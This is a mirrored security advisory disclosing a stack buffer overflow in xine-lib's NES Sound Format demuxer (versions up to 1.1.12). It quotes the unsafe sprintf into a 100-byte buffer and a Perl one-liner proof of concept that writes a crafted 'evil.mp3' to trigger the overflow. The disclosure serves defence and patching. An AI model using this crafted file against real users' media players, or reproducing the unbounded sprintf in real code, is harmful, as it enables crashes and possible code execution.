Lucene search
K

xinelib-overflow.txt

🗓️ 17 Apr 2008 00:00:00Reported by Guido LandiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

xine-lib 1.1.12 stack-based buffer overflow in NES Sound Format demuxe

Code
`xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES   
Sound Format demuxer(demux_nsf.c).  
  
  
- Code  
  
open_nsf_file():  
  
109: this->title = strdup(&header[0x0E]);  
  
demux_nsf_send_chunk():  
  
122: char title[100];  
162: sprintf(title, "%s, song %d/%d",  
this->title, this->current_song, this->total_songs);  
  
  
- Affected applications  
  
http://xinehq.de/index.php/releases  
  
  
- PoC  
  
perl -e 'print   
"\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "\x41" x   
114' > evil.mp3  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation